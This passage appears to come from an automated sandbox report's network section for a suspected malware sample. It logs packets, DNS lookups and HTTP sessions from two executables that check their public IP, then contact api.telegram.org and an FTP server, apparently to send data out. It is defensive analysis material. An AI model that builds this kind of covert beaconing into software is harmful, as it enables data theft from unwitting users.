Dec 5, 2024 18:51:37.488445044 CET	49788	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:37.488475084 CET	443	49788	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:37.817297935 CET	443	49789	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:37.819346905 CET	49789	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:37.819374084 CET	443	49789	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:37.951504946 CET	443	49788	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:37.951594114 CET	443	49788	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:37.951693058 CET	49788	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:37.952168941 CET	49788	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:37.969260931 CET	49781	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.089660883 CET	80	49781	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:38.089947939 CET	49781	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.106854916 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:38.106888056 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:38.106947899 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:38.107388020 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:38.107404947 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:38.347378016 CET	443	49789	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:38.347445011 CET	443	49789	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:38.347485065 CET	49789	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:38.348022938 CET	49789	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:38.352210045 CET	49782	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.353712082 CET	49796	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.473659039 CET	80	49782	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:38.473850012 CET	49782	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.474744081 CET	80	49796	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:38.474802971 CET	49796	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.474967957 CET	49796	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:38.594759941 CET	80	49796	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:39.480727911 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:39.480856895 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:39.484164000 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:39.484179020 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:39.484451056 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:39.486058950 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:39.531328917 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:39.896976948 CET	80	49796	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:39.898432016 CET	49799	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:39.898463964 CET	443	49799	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:39.898525000 CET	49799	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:39.898745060 CET	49799	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:39.898756027 CET	443	49799	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:39.949532986 CET	49796	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:40.000572920 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:40.000655890 CET	443	49795	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:40.000718117 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:40.005368948 CET	49795	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:41.122667074 CET	443	49799	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:41.124397993 CET	49799	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:41.124423027 CET	443	49799	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:41.578768969 CET	443	49799	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:41.578841925 CET	443	49799	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:41.578891993 CET	49799	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:41.579474926 CET	49799	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:41.585194111 CET	49796	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:41.586730957 CET	49803	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:41.705322981 CET	80	49796	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:41.705419064 CET	49796	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:41.706490993 CET	80	49803	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:41.706643105 CET	49803	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:41.706737995 CET	49803	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:41.826605082 CET	80	49803	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:43.116957903 CET	80	49803	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:43.121042013 CET	49809	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:43.121078968 CET	443	49809	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:43.121155024 CET	49809	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:43.121484995 CET	49809	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:43.121495008 CET	443	49809	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:43.168477058 CET	49803	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:44.400017023 CET	443	49809	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:44.401472092 CET	49809	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:44.401488066 CET	443	49809	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:44.852453947 CET	443	49809	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:44.852518082 CET	443	49809	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:44.852817059 CET	49809	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:44.853105068 CET	49809	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:44.862778902 CET	49803	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:44.863692045 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:44.863734007 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:44.863797903 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:44.864244938 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:44.864259005 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:44.983223915 CET	80	49803	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:44.983551025 CET	49803	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:46.251615047 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:46.251754045 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:46.253184080 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:46.253195047 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:46.253429890 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:46.254808903 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:46.295332909 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:46.502897978 CET	49708	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:46.774786949 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:46.774873018 CET	443	49815	149.154.167.220	192.168.2.7
Dec 5, 2024 18:51:46.774947882 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:46.777554035 CET	49815	443	192.168.2.7	149.154.167.220
Dec 5, 2024 18:51:49.568933964 CET	49826	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:49.688677073 CET	21	49826	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:49.688796043 CET	49826	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:49.763534069 CET	49826	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:49.885126114 CET	21	49826	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:49.885212898 CET	49826	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:51.280754089 CET	49832	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:51.400672913 CET	21	49832	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:51.400818110 CET	49832	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:51.401118994 CET	49832	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:51.522996902 CET	21	49832	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:51.523200035 CET	49832	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:52.142987013 CET	49732	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:52.574016094 CET	49833	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:52.694690943 CET	21	49833	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:52.694786072 CET	49833	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:52.695343018 CET	49833	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:52.818181992 CET	21	49833	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:52.818257093 CET	49833	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:54.202785015 CET	49839	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:54.322669983 CET	21	49839	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:54.322768927 CET	49839	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:54.323060989 CET	49839	21	192.168.2.7	119.18.54.39
Dec 5, 2024 18:51:54.443013906 CET	21	49839	119.18.54.39	192.168.2.7
Dec 5, 2024 18:51:54.443546057 CET	49839	21	192.168.2.7	119.18.54.39

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 18:51:08.739025116 CET	56552	53	192.168.2.7	1.1.1.1
Dec 5, 2024 18:51:08.889451027 CET	53	56552	1.1.1.1	192.168.2.7
Dec 5, 2024 18:51:11.011478901 CET	59019	53	192.168.2.7	1.1.1.1
Dec 5, 2024 18:51:11.159205914 CET	53	59019	1.1.1.1	192.168.2.7
Dec 5, 2024 18:51:37.969158888 CET	55954	53	192.168.2.7	1.1.1.1
Dec 5, 2024 18:51:38.106143951 CET	53	55954	1.1.1.1	192.168.2.7
Dec 5, 2024 18:51:48.810275078 CET	63305	53	192.168.2.7	1.1.1.1
Dec 5, 2024 18:51:49.568047047 CET	53	63305	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 18:51:08.739025116 CET	192.168.2.7	1.1.1.1	0x8897	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:11.011478901 CET	192.168.2.7	1.1.1.1	0xa979	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:37.969158888 CET	192.168.2.7	1.1.1.1	0xf38	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:48.810275078 CET	192.168.2.7	1.1.1.1	0x94e	Standard query (0)	kashmirestore.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 18:51:08.889451027 CET	1.1.1.1	192.168.2.7	0x8897	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2024 18:51:08.889451027 CET	1.1.1.1	192.168.2.7	0x8897	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:08.889451027 CET	1.1.1.1	192.168.2.7	0x8897	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:08.889451027 CET	1.1.1.1	192.168.2.7	0x8897	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:08.889451027 CET	1.1.1.1	192.168.2.7	0x8897	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:08.889451027 CET	1.1.1.1	192.168.2.7	0x8897	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:11.159205914 CET	1.1.1.1	192.168.2.7	0xa979	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:11.159205914 CET	1.1.1.1	192.168.2.7	0xa979	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:38.106143951 CET	1.1.1.1	192.168.2.7	0xf38	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 5, 2024 18:51:49.568047047 CET	1.1.1.1	192.168.2.7	0x94e	No error (0)	kashmirestore.com		119.18.54.39	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:09.019576073 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:10.439364910 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 5, 2024 18:51:10.477319002 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 5, 2024 18:51:10.970990896 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 5, 2024 18:51:12.941401958 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 5, 2024 18:51:13.429111958 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:15.257900000 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 5, 2024 18:51:16.668380976 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49714	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:15.671380997 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:17.071607113 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 5, 2024 18:51:17.079340935 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 5, 2024 18:51:17.656429052 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 5, 2024 18:51:19.417980909 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 5, 2024 18:51:19.903251886 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49722	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:18.500711918 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:19.918057919 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49732	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:21.708097935 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 5, 2024 18:51:23.120934010 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49733	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:21.735888004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:23.136339903 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49749	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:24.953478098 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:26.367177010 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49750	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:24.956271887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:26.362000942 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49758	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:28.268332005 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:29.738684893 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49759	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe
